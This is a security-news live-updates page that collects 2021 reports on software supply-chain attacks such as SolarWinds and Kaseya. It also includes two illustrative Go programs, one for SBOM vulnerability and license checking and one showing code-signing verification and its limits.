Live Updates: Supply-Chain Attacks - SolarWinds/Solorigate (SUNBURST), Kaseya VSA, and More

A hacking group, allegedly Russia-backed, is believed to have targeted and breached the U.S. Departments of the Treasury and Commerce. According to Reuters, the breach originated from a supply chain attack that leveraged Orion, the widely used network monitoring platform from SolarWinds, an IT company whose software is used by several federal agencies and the U.S. military. Last week, cybersecurity company FireEye reported a similar attack carried out via the SolarWinds platform that led to the theft of its red-team tools. A large number of organizations that use this software may be at risk. FireEye tracks the actor behind this widespread campaign as UNC2452; the backdoor delivered through trojanized Orion updates is tracked under several names, including SUNBURST (FireEye) and Solorigate (Microsoft).

Cyware has created this resource to collect and share live alerts on this campaign, impacted organizations as reported in the media, indicators of compromise (IOCs), and other relevant threat intelligence. We are actively working to keep this page updated and accurate in order to ensure that it is timely and relevant to as many people as possible.

Solutions and Countermeasures

Advisories

Indicators of Compromise (IOCs)

Threat Response Workflow

Killswitch

Network Auditing Tool

_______________________________________________________________________________________

(Sept 17, 2021)

SushiSwap's MISO launchpad hit by $3 million supply chain attack

SushiSwap's chief technology officer says the company's MISO platform has been hit by a software supply chain attack. CTO Joseph Delong announced that an auction on MISO launchpad had been hijacked via a supply chain attack. An "anonymous contractor" with the GitHub handle AristoK3 and access to the project's code repository had pushed a malicious code commit that was distributed on the platform's front end.


_______________________________________________________________________________________

(Sept 16, 2021)

Azure zero-day flaws highlight lurking supply-chain risk

Four zero-day vulnerabilities in Open Management Infrastructure (OMI), the management agent Microsoft deploys on Linux virtual machines in Azure, show that OMI is a significant security blind spot. Collectively dubbed OMIGOD, the flaws affect thousands of Azure customers and millions of endpoints, and illustrate the hidden supply-chain risk carried by platform-managed components that customers do not install themselves.


_______________________________________________________________________________________

(Sept 15, 2021)

Why open-source software supply chain management is worse than you think

The seventh annual State of the Software Supply Chain Report has revealed that a majority of respondents use an ad hoc approach to software supply chain management for most parts of the process, except for remediation and inventory. The analysis revealed that 29% of popular open-source projects contain at least one known security vulnerability compared to only 6.5% of less popular OSS projects. 


_______________________________________________________________________________________

(Sept 15, 2021)

Supply chain attacks against the open-source ecosystem soar by 650%

The last year has seen a massive rise in the number of software supply chain attacks aimed at upstream public repositories, a new report has revealed. According to Sonatype’s annual State of the Software Supply Chain Report, more than 12,000 such attacks were recorded, a 650% year-over-year increase; the previous year’s report had itself recorded a 430% increase.

Ref - PortSwigger 

_______________________________________________________________________________________

(Sept 15, 2021)

Execs concerned about software supply chain security, but not taking action

According to ENISA, supply chain attacks, such as SolarWinds, Codecov, and Kaseya, are expected to increase by a factor of four in 2021. Executives are clearly much more concerned about their vulnerability to software supply chain attacks and aware of the urgent need for action.


_______________________________________________________________________________________

(Sept 15, 2021)

Supply chain attacks on open source repositories are reaching new highs

There has been a whopping 650% year-over-year increase in supply chain attacks aimed at upstream open-source public repositories, according to a new report. Interestingly, despite the risk, cybersecurity company Sonatype’s seventh annual State of the Software Supply Chain Report notes strong growth in the supply and demand of open-source software.

Ref - TechRadar 

_______________________________________________________________________________________

(Sept 15, 2021)

What the Kaseya attack can teach local governments about preventing third-party data breaches

There are ways to minimize, or at the very least mitigate, the risks associated with supply chain attacks. In a recent report on the state of third-party security, 44% of organizations surveyed said they had experienced a third-party data breach within the last 12 months. Of those organizations, 74% attributed the breach to giving too much privileged access to third parties.


_______________________________________________________________________________________

(Sept 15, 2021)

Who bears the brunt of supply chain attacks?

A survey by Venafi shows that most executives are not taking action that will drive change. While 94% of executives believe there should be clear consequences for software vendors that fail to protect the integrity of their software build pipelines, most have done little to change the way they evaluate the security of the software they purchase or the assurances they demand from software providers.

Ref - TechHQ 

_______________________________________________________________________________________

(Sept 13, 2021)

Ways to improve cyber resilience against ransomware, supply chain attacks

There are some common, vital steps we can all take to protect sensitive data: a renewed focus on database security, collaboration across the public and private sectors, continuous monitoring, mitigation and testing, training and retaining cybersecurity experts, and designing security on the assumption that agencies will come under attack.

Ref - GCN

_______________________________________________________________________________________
 
(Sept 13, 2021)

Can advanced code-signing help end supply chain attacks?

The software company signs every piece of code with the private key, and recipients check the validity with the public key. Unfortunately, once hackers have access to a code-signing key, either through theft or by gaining access to a build server and tricking the system, they can easily disguise their malware. They only need one piece of signed code to gain back-door access to networks, and there’s a vast range of potential victims. 


_______________________________________________________________________________________

(Sept 10, 2021)

Securing the supply chain in the age of hybrid work

In today’s connected world, everyone—from device manufacturers to consumers—has a responsibility to improve cybersecurity by working together. Companies must seek out vendors that can provide security assurance, as well as realize the need to upgrade their security posture to maintain customer trust and prevent cyber disasters. The more informed an organization is about its devices, the stronger its supply chain security posture will be.

Ref - SDCExecutive 

_______________________________________________________________________________________

(Sept 8, 2021)

Security at scale in the open-source supply chain

Instead of the one-by-one approach to patching, security professionals need to start thinking about securing entire classes of vulnerabilities. It’s true that there is no current catch-all mechanism for such efficient action. But researchers can begin to work together to create methodologies that enable security organizations to better prioritize vulnerability risk management (VRM) instead of filing each one away to patch at a later date.

Ref - Rapid7 

_______________________________________________________________________________________

(Sept 7, 2021)

Combatting defense supply chain and critical infrastructure vulnerability with AI

Assessing defense supply chain risk boils down to understanding the relationships of the contracting organizations that support the government’s mission. Using advanced technology, including artificial intelligence and machine learning processes, supply chains can be mapped and potential gaps or pain points identified, from connections with sanctioned parties and adversary-controlled entities to distribution bottlenecks and sole-source suppliers.

Ref - NextGov 

_______________________________________________________________________________________

(Sept 4, 2021)

Microsoft says Chinese hackers were behind SolarWinds Serv-U SSH 0-day attack

Microsoft has shared technical details about a now-fixed, actively exploited critical security vulnerability affecting SolarWinds Serv-U managed file transfer service that it has attributed with "high confidence" to a threat actor operating out of China. In mid-July, the Texas-based company remedied a remote code execution flaw (CVE-2021-35211) that was rooted in Serv-U's implementation of the Secure Shell (SSH) protocol.


_______________________________________________________________________________________

(Sept 2, 2021)

Autodesk was one of the 18,000 firms breached in SolarWinds attack

Autodesk, maker of computer-aided design (CAD) software for manufacturing, has told the U.S. stock market it was targeted as part of the supply chain attack on SolarWinds' Orion software. In a filing with the U.S. Securities and Exchange Commission (SEC), Autodesk said it had identified a compromised server in the wake of public reporting of the SolarWinds breach.

Ref - The Register 

_______________________________________________________________________________________

(Sept 2, 2021)

What Biden’s cybersecurity executive order means for supply chain attacks

One major outcome of the executive order is baselining. People may disagree about what should count as ‘critical’, but at least there is now a formal definition on the books. Critical software, as defined in the executive order, is any software that has, or has direct software dependencies upon, one or more components with at least one of the attributes the order lists.


_______________________________________________________________________________________

(Sept 2, 2021)

A deep-dive into the SolarWinds Serv-U SSH vulnerability

Several weeks ago, Microsoft detected a 0-day remote code execution exploit being used to attack the SolarWinds Serv-U FTP software in limited and targeted attacks. The Microsoft Threat Intelligence Center (MSTIC) attributed the attack with high confidence to DEV-0322, a group operating out of China, based on observed victimology, tactics, and procedures.

Ref - Microsoft
 
_______________________________________________________________________________________

(Sept 1, 2021)

How to stop supply chain attacks in their tracks

While agencies like the FBI and CISA have been warning for some time that MSPs are likely targets of advanced persistent threats (APTs), the Kaseya attack seems to have crossed a threshold. The problem is a significant security challenge, and one that some think only vendors can solve.


_______________________________________________________________________________________

(Aug 31, 2021)

A data breach may be lurking in your software supply chain

The software supply chain is clearly an increasing target for intrusion. And that’s exactly where a lot of sensitive data resides. The unfortunate reality is that sensitive information in non-prod environments goes largely unprotected. Recent research shows 56% of enterprise customers don’t anonymize sensitive data in test environments.


_______________________________________________________________________________________

(Aug 31, 2021)

Cyberattacks use Office 365 to target supply chain

Supply chain attacks starting in Office 365 can take on many different forms. For instance, spear phishers can use a compromised Office 365 account to scout out a targeted employee’s ongoing emails. They can then use what they learn to go after vendors and suppliers with business email compromise fraud attacks.


_______________________________________________________________________________________

(Aug 30, 2021)

How executive order requirements will change the scope of business

It is anticipated that the technical requirements under the EO will be applied broadly across the software industry. Each software vendor will have to compete commercially alongside the companies that are directly subject to the EO’s rules. Failing to meet the increased security and transparency requirements that the EO will impose will, for many, translate into a competitive disadvantage in the marketplace.


_______________________________________________________________________________________

(Aug 30, 2021)

How to fix the weakest link in cyber security

Many small and medium-sized businesses (SMBs) might think they are immune from cyber attacks. However, recent research shows that is no longer the case. Almost a third (28%) of data breaches in 2020 involved small businesses, and more than 22% of SMBs have suffered a security breach due to a remote worker since the beginning of the COVID-19 outbreak.

Ref - IT Pro

_______________________________________________________________________________________

(Aug 27, 2021)

Supply chain cyber security is only as strong as the weakest link

A primary method used by criminals to attack supply chains is impersonation, which can be remarkably sophisticated. Cybercriminals can spend months stalking employees’ social media accounts and company press releases in order to work out details of a supply chain, deducing where they might insert themselves to fraudulently divert invoices or encourage employees to engage with phishing scams.


_______________________________________________________________________________________

(Aug 27, 2021)

A new threat is coming from inside Docker container images

Aqua Security's threat research arm, Team Nautilus, has found five images accounting for a whopping 120,000 pulls by unsuspecting users. Team Nautilus is further warning that the malicious Docker images could be part of a larger software supply chain attack with its eyes on disrupting cloud-native environments.


_______________________________________________________________________________________

(Aug 27, 2021)

Cyber experts seek clarity on the NIST supply chain framework

Cyber experts agree a technology supply chain security framework developed by the National Institute of Standards and Technology will be a useful tool for agencies and industry. They are less sure about what it will look like. The prevailing theory is the new framework will focus primarily on the software supply chain —in light of the recent Microsoft Exchange server attacks, the Kaseya ransomware attack, and the SolarWinds breach.

Ref - Fed Scoop 

_______________________________________________________________________________________

(Aug 26, 2021)

White House unveils supply chain, new security initiatives

The Biden administration unveiled a new package of supply chain and critical infrastructure security initiatives following a meeting at the White House with about 25 tech, banking, insurance, and infrastructure executives. The initiatives feature a pledge by several companies, including tech giants Microsoft, Google and IBM, and insurers Travelers and Coalition, and the U.S. NIST, to create a framework to build more security into the nation's technology supply chain to help ensure its integrity, according to a fact sheet released by the White House.


_______________________________________________________________________________________

(Aug 26, 2021)

Realtek flaw exposes dozens of brands to supply chain attacks

German security firm IoT Inspector reports that the Realtek bug, tracked as CVE-2021-35395, affects over 200 Wi-Fi and router products from 65 vendors, including Asus, Belkin, China Mobile, Compal, D-Link, LG, Logitec, Netgear, ZTE, and Zyxel. The flaw is located in a Realtek software developer kit (SDK) and is currently under attack from a group using a variant of the IoT malware, Mirai.

Ref - ZDNet 

_______________________________________________________________________________________

(Aug 26, 2021)

Cybersecurity professor works to close the door on hackers

Santiago Torres Arias, an assistant professor of electrical and computer engineering at Purdue, said a cumulative 500% increase in the number of software supply chain compromises is giving hackers the weak link they need to attack a system. In supply chain attacks, Torres Arias said, hackers search for the one vulnerable program in a chain of software and compromise it.


_______________________________________________________________________________________

(Aug 26, 2021)

Apple: It's time to bolster supply chain security

Apple announced it will establish a new program to drive continuous security improvements throughout the technology supply chain. As part of that program, Apple will work with its suppliers - including more than 9,000 in the United States - to drive the mass adoption of multi-factor authentication, security training, vulnerability remediation, event logging, and incident response.


_______________________________________________________________________________________

(Aug 26, 2021)

Google - Updates on collaboration with NIST to secure the software supply chain

Google participated in President Biden’s White House Cyber Security Summit where it shared recommendations to advance the administration’s cybersecurity agenda. This included its commitment to invest $10 billion over the next five years to expand zero-trust programs, help secure the software supply chain, and enhance open-source security.

Ref - Google Blogs 

_______________________________________________________________________________________

(Aug 26, 2021)

Taking control of cyber attacks

Organizations, as well as supply chains, have been blind-sided with new, sophisticated, and frequent tactics, causing CXOs and IT teams to scramble for protection and remediation. It may seem that cyber adversaries are running with the ball unobstructed toward the end zone, but it’s time to block and tackle them before they get yet another touchdown. 

Ref - IBTimes 

_______________________________________________________________________________________

(Aug 26, 2021)

How does PCI DSS prevent supply-chain attacks

The PCI Council recognized the growing level of risk exposure and, in PCI DSS 3.2, highlighted the importance of mitigating and managing third-party risk. The PCI DSS requirement calls for measures ensuring compliance throughout the data supply chain.

Ref - ECCouncil 

_______________________________________________________________________________________

(Aug 25, 2021)

Apple, Microsoft and Amazon chiefs to meet Biden over critical infrastructure cyber attacks

US President Joe Biden has invited Apple CEO Tim Cook, Microsoft CEO Satya Nadella, and Amazon president and CEO Andy Jassy to the White House to discuss how the private sector can help combat ransomware and software supply chain attacks.

Ref - MSN

_______________________________________________________________________________________

(Aug 24, 2021)

Supply chain vulnerability in cloud connectivity platform threatens 83 Million IoT devices

A supply chain vulnerability in the ThroughTek “Kalay” network, a cloud-based communications platform used by an estimated 83 million Internet of Things (IoT) devices, could allow for remote compromise and control to include monitoring audio and video feeds and exposing passwords.

 
_______________________________________________________________________________________

(Aug 24, 2021)

Supply chain attacks - vendors are at risk

Supply chain attacks piggyback legitimate processes to gain uninhibited access into a business's ecosystem. This attack begins with infiltrating a vendor's security defenses. This process is usually much simpler than attacking a victim directly due to the unfortunate myopic cybersecurity practices of many vendors.

Ref - Upguard 

_______________________________________________________________________________________

(Aug 23, 2021)

SSDF: The Key to Defending Against Supply Chain Cyberattacks

One of the best modern ways to combat the supply chain cyberattacks is to integrate a secure software development framework (SSDF) into a vendor’s software development life cycle (SDLC). The SSDF provides software vendors with a framework by which they can implement security measures and cut down on cyberattacks.

 
_______________________________________________________________________________________

(Aug 20, 2021)

A year of supply chain attacks: Ways to protect SDLC

Developers must make sure that any third-party components they use have no security or compliance gaps, such as an unpatched critical vulnerability, malware, or a misconfigured setting. Otherwise, their software can put employees and customers at risk of security and compliance breaches. The article also notes that the lack of visibility into the makeup of commercial and open-source software can be improved with software bills of materials (SBOMs).

Ref - JFrog 

_______________________________________________________________________________________

(Aug 20, 2021)

How to protect supply chains from ransomware attacks

Supply chains critical to the energy, food, and IT infrastructures are increasingly at risk, and threat actors are coming up with more sophisticated ways to exploit vulnerabilities within these supply chains. Because of this, traditional cybersecurity tactics are no longer enough, and this applies not just to large and prominent organizations but to smaller businesses as well.


_______________________________________________________________________________________

(Aug 18, 2021)

Lifting the veil on cyber vulnerabilities in government supply chain pipelines

The security team should help assess the safety of third-party additions to the tech stack, but decisions are often driven by a business need with little choice among solutions. At that point, it becomes a trust exercise: does the vendor care about security as much as your company does, and can the vendor actually assess the risks, and the assets you need to protect, as only you can?


_______________________________________________________________________________________

(Aug 18, 2021)

Supply chain attacks on IoT - Million+ devices are vulnerable

Taiwanese chip designer Realtek has warned of four recent vulnerabilities in three SDKs for its Wi-Fi modules and published an advisory covering the flaws, which affect almost 200 products made by multiple vendors. The vulnerabilities allow unauthenticated remote attackers to cause denial of service or device crashes, inject arbitrary commands, and ultimately gain complete control of the device at its highest privilege level.

Ref - Medium

_______________________________________________________________________________________

(Aug 18, 2021)

Iranian hackers target several Israeli organizations with supply-chain attacks

IT and communication companies in Israel were at the center of a supply chain attack campaign spearheaded by an Iranian threat actor that involved impersonating the firms and their HR personnel to target victims with fake job offers. The attacks have been linked to a hacker group called Siamesekitten (aka Lyceum or Hexane) that has primarily singled out oil, gas, and telecom providers in the Middle East and Africa since at least 2018.


_______________________________________________________________________________________

(Aug 18, 2021)

Software composition analysis can help protect the software supply chain

Protecting the software supply chain is a multifaceted challenge that includes code signing, identity and access management, policy, and software composition analysis (SCA). SCA has always played a role in protecting the software supply chain, historically by identifying vulnerabilities and licensing risks in open source libraries and advising security and development teams on upgrade paths.

Ref - Forrester
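The SBOM-based visibility described in the Aug 20 JFrog entry and the SCA checks described in this Forrester entry come down to the same mechanical step: read the inventory of components and versions, then match each one against advisories and license policy. The following Go program is an added example written for this page, not code from JFrog, Forrester or any SCA product. The SBOM is a constructed CycloneDX-style JSON document, and the advisory identifiers (ADV-0001, ADV-0002), package names and fixed-in versions are hypothetical. It also shows the version-comparison pitfall that trips up naive checks: comparing "1.10.0" and "1.9.0" as strings gets the order wrong.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strconv"
	"strings"
)

// SBOM is the subset of a CycloneDX JSON document used here.
type SBOM struct {
	Components []Component `json:"components"`
}

// Component is one inventory entry: name, version and declared licenses.
type Component struct {
	Name     string    `json:"name"`
	Version  string    `json:"version"`
	Licenses []License `json:"licenses"`
}

// License mirrors CycloneDX's nested {"license": {"id": "..."}} shape.
type License struct {
	License struct {
		ID string `json:"id"`
	} `json:"license"`
}

// Advisory is a constructed record (hypothetical IDs, not real CVEs):
// every version of Package below FixedIn is considered affected.
type Advisory struct {
	ID, Package, FixedIn string
}

// Finding is one vulnerable or non-compliant component.
type Finding struct {
	Package, Version, Issue string
}

// SampleSBOM is a constructed inventory, not taken from any real product.
const SampleSBOM = `{
  "bomFormat": "CycloneDX",
  "components": [
    {"name": "libfoo",    "version": "1.4.2", "licenses": [{"license": {"id": "MIT"}}]},
    {"name": "parserlib", "version": "2.0.9", "licenses": [{"license": {"id": "GPL-3.0-only"}}]},
    {"name": "netutil",   "version": "3.1.0", "licenses": [{"license": {"id": "Apache-2.0"}}]}
  ]
}`

// SampleAdvisories are hypothetical: netutil 3.1.0 is already past its fix.
var SampleAdvisories = []Advisory{
	{ID: "ADV-0001", Package: "libfoo", FixedIn: "1.4.5"},
	{ID: "ADV-0002", Package: "netutil", FixedIn: "3.0.2"},
}

// DeniedLicenses is an example policy: copyleft licenses are not permitted.
var DeniedLicenses = map[string]bool{"GPL-3.0-only": true, "AGPL-3.0-only": true}

// parseVersion turns "v1.2.3" into [1 2 3]. A non-numeric part counts as 0,
// so a pre-release such as "1.4.5-rc1" parses as 1.4.0 and is still flagged
// against a fix in 1.4.5, which is the conservative outcome.
func parseVersion(v string) [3]int {
	var out [3]int
	for i, p := range strings.SplitN(strings.TrimPrefix(v, "v"), ".", 3) {
		n, _ := strconv.Atoi(p)
		out[i] = n
	}
	return out
}

// VersionLess compares numerically, component by component, so that
// 1.9.0 < 1.10.0 (a plain string comparison would say the opposite).
func VersionLess(a, b string) bool {
	x, y := parseVersion(a), parseVersion(b)
	for i := range x {
		if x[i] != y[i] {
			return x[i] < y[i]
		}
	}
	return false
}

// Analyze parses the SBOM and reports every component that is below an
// advisory's fixed version or carries a denied license.
func Analyze(sbomJSON []byte, advisories []Advisory, denied map[string]bool) ([]Finding, error) {
	var s SBOM
	if err := json.Unmarshal(sbomJSON, &s); err != nil {
		return nil, fmt.Errorf("parse SBOM: %w", err)
	}
	var out []Finding
	for _, c := range s.Components {
		for _, a := range advisories {
			if a.Package == c.Name && VersionLess(c.Version, a.FixedIn) {
				out = append(out, Finding{c.Name, c.Version, a.ID + " (fixed in " + a.FixedIn + ")"})
			}
		}
		for _, l := range c.Licenses {
			if denied[l.License.ID] {
				out = append(out, Finding{c.Name, c.Version, "license " + l.License.ID + " not permitted"})
			}
		}
	}
	return out, nil
}

func main() {
	findings, err := Analyze([]byte(SampleSBOM), SampleAdvisories, DeniedLicenses)
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("%s %s: %s\n", f.Package, f.Version, f.Issue)
	}
}
```

On the constructed input this reports libfoo 1.4.2 against ADV-0001 and parserlib 2.0.9 for its license, and leaves netutil alone because 3.1.0 is above the fixed version. A real pipeline would load advisories from a vulnerability database rather than a hard-coded slice, but the matching and the numeric version comparison are the parts that must be right.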

_______________________________________________________________________________________

(Aug 18, 2021)

Supply chain attacks are closing in on MSPs

Like a technology that advances through state-sponsored R&D but then becomes available to a wider public, recent supply chain attack techniques were honed by state-backed actors but have now been adopted by more run-of-the-mill ransomware actors. This is bad news for MSPs. While agencies like the FBI and CISA have been warning for some time that MSPs are likely targets of advanced persistent threats (APTs), the Kaseya attack seems to have crossed a threshold.

Ref - Webroot 

_______________________________________________________________________________________

(Aug 17, 2021)

How to accelerate U.S. supply chain and security innovation

Dr. Tommy Gardner, Chief Technology Officer of HP Federal, believes a proactive mindset that bridges the digital divide, recruits top talent and implements the right policies is needed for the U.S. to achieve success and remain competitive on a global scale. According to him, a national strategy for critical technologies can shape the industries of the future as well as address national security and global challenges.

 
_______________________________________________________________________________________

(Aug 16, 2021)

ENISA predicts fourfold increase in software supply chain attacks in 2021

The European Union Agency for Cybersecurity (ENISA) warns of increasing supply chain attacks in 2021 as advanced persistent threat (APT) actors employ techniques more sophisticated than those seen in conventional targeted attacks. The agency studied 24 supply chain attacks from January 2020 to July 2021 and found that strong security protection within an organization is no longer sufficient when attackers have already compromised its suppliers.

Ref - CPO Magazine 

_______________________________________________________________________________________

(Aug 16, 2021)

5 Ways to defend against supply chain cyberattacks

Security Intelligence recommends five keys to start proactively reducing supply chain attack risk: inform developers about cyberattacks, monitor open-source projects, implement zero trust, use built-in data protection, and focus on third-party risks.


_______________________________________________________________________________________

(Aug 16, 2021)

Devices from many vendors can be hacked remotely due to flaws in Realtek SDK

A large number of IoT systems could be exposed to remote hacker attacks due to serious vulnerabilities found in software development kits (SDKs) provided to device manufacturers by Taiwan-based semiconductor company Realtek. The list of impacted manufacturers and vendors includes ASUS, Belkin, D-Link, Huawei, LG, Logitech, Netgear, ZTE, and Zyxel.


_______________________________________________________________________________________

(Aug 16, 2021)

Do open-source supply chains leave security gaps in organizations?

Infiltrating open source libraries can also be a more covert approach than directly attacking organizations: if the library is already part of a trusted supply chain, its malicious activity is less likely to be detected. Attacking an organization directly is tricky and will typically be harder and yield slower and fewer results.


_______________________________________________________________________________________

(Aug 16, 2021)

Companies need to finally embrace zero-trust

The industry has long viewed patching as a best practice and fundamental to any mature approach to cybersecurity. But what incidents like SolarWinds, Exchange, and Colonial Pipeline taught us is that organizations need to supplement their detection-based cybersecurity solutions, such as endpoint detection and response (EDR) and firewalls, and reactive patching with a proactive cybersecurity framework that fills the gap in the middle.


_______________________________________________________________________________________

(Aug 14, 2021)

Software’s supply chain security problem

Software supply chain attacks break the current model of cybersecurity. “Trusted” partners have become an increasing source of risk and compromise. Attacks can involve allowlisted, or perceived legitimate, software that passes basic and advanced security checks. The backdoored software can carry a valid digital signature or code signing, a perceived “stamp of approval” from the vendor that it is legitimate.

Ref - Medium 
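The Sept 13 code-signing entry above describes the mechanism (vendor signs with the private key, recipients verify with the public key) and its limit (a stolen key signs malware just as well), and this entry makes the same point about validly signed backdoors. The Go program below is an added example written for this page, not code from either article or from any vendor, and uses Ed25519 from the Go standard library. The release names, payload bytes and the idea of a separately published digest list are constructed for illustration. It walks through four cases: a genuine release verifies, a release tampered in transit fails, a backdoored release signed with the stolen key passes the signature check, and an independent pinned-digest check is what finally rejects it.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
)

// Release is a hypothetical signed artifact: the bytes a vendor ships plus the
// vendor's Ed25519 signature over those bytes.
type Release struct {
	Name      string
	Payload   []byte
	Signature []byte
}

// Sign is what the vendor's build pipeline does. Whoever holds priv, including
// an attacker who stole it or who controls the build server, can produce
// releases that verify.
func Sign(priv ed25519.PrivateKey, name string, payload []byte) Release {
	return Release{Name: name, Payload: payload, Signature: ed25519.Sign(priv, payload)}
}

// VerifySignature is the check recipients normally perform: is the signature
// valid under the vendor's published public key? It answers "who signed this",
// not "is this the build the vendor meant to ship".
func VerifySignature(pub ed25519.PublicKey, r Release) bool {
	return ed25519.Verify(pub, r.Payload, r.Signature)
}

// DigestHex returns the SHA-256 of an artifact as lowercase hex.
func DigestHex(payload []byte) string {
	sum := sha256.Sum256(payload)
	return hex.EncodeToString(sum[:])
}

// VerifyPinned adds a second, independent check: the artifact's digest must
// match one published out of band (for example from a reproducible build or a
// transparency log). A stolen signing key alone cannot satisfy this.
func VerifyPinned(pub ed25519.PublicKey, r Release, pinned map[string]string) bool {
	if !VerifySignature(pub, r) {
		return false
	}
	want, ok := pinned[r.Name]
	return ok && want == DigestHex(r.Payload)
}

func main() {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}

	// Case 1: genuine release, signed by the vendor's pipeline.
	good := Sign(priv, "agent-1.0.0", []byte("legitimate update bytes"))
	fmt.Println("genuine release verifies:        ", VerifySignature(pub, good))

	// Case 2: bytes altered after signing; the signature no longer matches.
	tampered := good
	tampered.Payload = []byte("altered in transit")
	fmt.Println("tampered release verifies:       ", VerifySignature(pub, tampered))

	// Case 3: attacker with the stolen key signs a backdoored build. The
	// signature is valid, so signature verification alone accepts it.
	backdoored := Sign(priv, "agent-1.0.1", []byte("backdoored update bytes"))
	fmt.Println("backdoored (stolen key) verifies:", VerifySignature(pub, backdoored))

	// Case 4: pinned digests published independently of the signing key.
	pinned := map[string]string{"agent-1.0.0": DigestHex([]byte("legitimate update bytes"))}
	fmt.Println("genuine passes pinned check:     ", VerifyPinned(pub, good, pinned))
	fmt.Println("backdoored passes pinned check:  ", VerifyPinned(pub, backdoored, pinned))
}
```

The takeaway is the one the two articles make: signature verification proves possession of the key, so the defence has to protect the key and the build that feeds it (HSM-held keys, locked-down build servers) and, where possible, add a check the key holder cannot forge on their own, such as matching against an independently reproduced build digest.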

_______________________________________________________________________________________

(Aug 13, 2021)

SolarWinds 2.0 could ignite financial crisis

“This incident confirms that the next great financial crisis could come from a cyberattack,” superintendent of financial services Linda A. Lacewell said in a press release following the DFS’ investigation of New York’s financial services industry’s response to the supply-chain attack. Seeing hackers gain access to thousands of organizations in one stroke underscores that cyberattacks threaten not just individual companies but also the stability of the financial industry as a whole.


_______________________________________________________________________________________

(Aug 13, 2021)

Supply chain attacks using container images

Aqua Security’s threat research team has uncovered several supply chain attacks that use malicious container images to compromise their victim. These five container images were found on Docker Hub. The images hijack organizations’ resources to mine cryptocurrency and can be used as part of a supply chain attack targeting cloud native environments.

Ref - AquaSec 

_______________________________________________________________________________________

(Aug 12, 2021)

How do supply chain attacks work?

Supply chain attacks are an emerging type of threat targeting software developers and suppliers. The goal is to access source code, build processes, or update mechanisms and infect legitimate apps in order to distribute malware. Attackers look for insecure network protocols, unprotected server infrastructure, and insecure coding practices. They break in, change source code, and hide malware in build and update processes.

Ref - Microsoft 

_______________________________________________________________________________________

(Aug 12, 2021)

Most supply chain attacks target supplier’s code

According to the European Union Agency for Cybersecurity’s (ENISA) Threat Landscape for Supply Chain Attacks, 62% of supply chain attacks use malware as a technique. The report examined 24 supply chain attacks documented from January 2020 to July 2021. About 50% of the attacks were attributed by the security community to well-known Advanced Persistent Threat (APT) groups. The report also notes that strong security protection is no longer adequate for enterprises once attackers have already compromised their suppliers.

Ref - Trend Micro 

_______________________________________________________________________________________

(Aug 12, 2021)

12-Year-old router vulnerability discovered exposing millions of devices for supply chain risks

Tenable security researchers discovered a 12-year-old router vulnerability that could allow an attacker to bypass authentication and obtain a root BusyBox shell over telnet. The path traversal vulnerability, CVE-2021-20090, originates in Arcadyan firmware used by various router brands. The vulnerability exists in the supply chain of at least 20 models from at least 17 vendors in 11 countries, including the U.S., Japan, Germany, Australia, Mexico, and New Zealand.

Ref - CPO Magazine 

_______________________________________________________________________________________

(Aug 12, 2021)

Current Security Trends - software supply chain on radar

There are three areas executives can focus on to increase visibility into software supply chain security and help prevent security breaches: a leap to DevSecOps, gaining software transparency, and embracing a continuous security culture.

Ref - Forbes 

_______________________________________________________________________________________

(Aug 12, 2021)

Supply chain is the target for cybercriminals

The 2021 Webroot BrightCloud threat report has confirmed what many in the managed services world already know – that they are firmly in the sights of malware attacks. The management of companies and enterprises industry has shown the most significant increase in malware infections – 57% versus the global average. This highlights the fact that technology supply chains are under attack.


_______________________________________________________________________________________

(Aug 11, 2021)

Threat alert: Supply chain attacks using container images

Team Nautilus, Aqua Security’s threat research team, has uncovered several supply chain attacks that use malicious container images to compromise their victims. These five container images were found on Docker Hub, which the team scans daily for signs of malicious activity. The images hijack organizations’ resources to mine cryptocurrency and can be used as part of a supply chain attack targeting cloud native environments.

Ref - AquaSec

_______________________________________________________________________________________

(Aug 10, 2021)

Black Hat 2021: Zero-days, ransoms, and supply chains

During Black Hat 2021, Corellium COO Matt Tait highlighted that there was a significant rise in the number of zero-days identified and exploited in the wild, stolen zero-days, and supply chain assaults. Tait described supply chain assaults as a whole different type of cybercrime danger. The entire economics of mass exploitation, he explains, is turned upside down because of supply chain attacks. 


_______________________________________________________________________________________

(Aug 10, 2021)

Cyber-industry needs to get back to basics

There needs to be a much greater emphasis on getting the basics right in cybersecurity, according to Robert Hannigan, chairman of BlueVoyant, speaking during his keynote address on day one of the Infosecurity Europe virtual conference, which took place from 13-15 July 2021. While the most critical vendors are generally the focus for large businesses, the less well-known suppliers in the ecosystem are typically the most vulnerable. This is because such a supplier might be a small company with one person doing cybersecurity, if anyone.

 
_______________________________________________________________________________________

(Aug 9, 2021)

3 Strategies to secure the digital supply chain

Corporate leaders and IT teams can take three steps to prioritize and remediate vulnerabilities and forestall supply chain cyberattacks. IT managers should rely more on automated tools to fix simple vulnerabilities. Businesses should conduct a cost-benefit analysis for vulnerability patching. And thirdly, procurers should demand that critical technology vendors implement “hot patching.”

Ref - HBR

_______________________________________________________________________________________

(Aug 9, 2021)

How to strengthen supply chain security

As demonstrated by the recent ransomware cybersecurity attacks, everyone suffers when a supply chain is compromised: buyers, suppliers, and users. The pace and magnitude of these and other attacks are increasing. It is clear that supply chain security needs strong oversight and control to ensure security.


_______________________________________________________________________________________

(Aug 9, 2021)

Kaseya could be the turning point for supply chain attacks

In the aftermath of Kaseya, we have been reminded that complacency can exact a terrible price. With the risk of harm no longer limited to sprawling enterprises with deep pockets, the incident should trigger new security discussions across IT departments of every size.


_______________________________________________________________________________________

(Aug 9, 2021)

Takeaways on the state of OT security and the cyber supply chain

Ensuring the integrity of the cyber supply chain is a significant challenge for OT security professionals. Supply chains continue to grow, and a recent survey indicates that organizations have an average of 27 third parties as part of their cyber supply chains, which span across different types of IT providers, OT providers, and channel partners. Many of these third parties have access to internal assets, a fact that has serious security implications. 

Ref - Fortinet 

_______________________________________________________________________________________

(Aug 9, 2021)

Kaseya VSA ransomware attack: A bombshell supply-chain hit

Large ransomware or other such attacks are promulgated and perpetuated by hackers through third-party vendors critical to infrastructure and/or business operations. It is important to manage risk from third-party vendors by establishing a risk management process and a baseline for secure operations. Essentially, that means developing and maintaining a risk register using standards-based assessments (NIST, ISO, SIG, CAIQ).


_______________________________________________________________________________________

(Aug 7, 2021)

